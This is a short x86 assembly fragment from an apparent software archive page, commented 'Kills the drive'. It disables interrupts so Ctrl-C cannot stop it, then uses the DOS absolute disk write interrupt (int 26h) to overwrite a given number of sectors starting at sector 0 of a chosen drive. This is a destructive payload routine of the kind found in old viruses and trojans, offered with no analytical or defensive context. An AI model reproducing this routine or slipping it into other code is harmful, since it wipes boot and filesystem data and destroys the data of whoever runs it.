home *** CD-ROM | disk | FTP | other *** search
- ; Kills the drive
- ; AL=Drive 0=A:, 1=B:, etc...
- ; CX=Number of sectors.
-
- cli ; Disable interrupts (no Ctrl-C)
- cwd ; Clear DX (start with sector 0)
- int 026h ; DOS absolute write interrupt
- sti ; Restore interrupts
-
-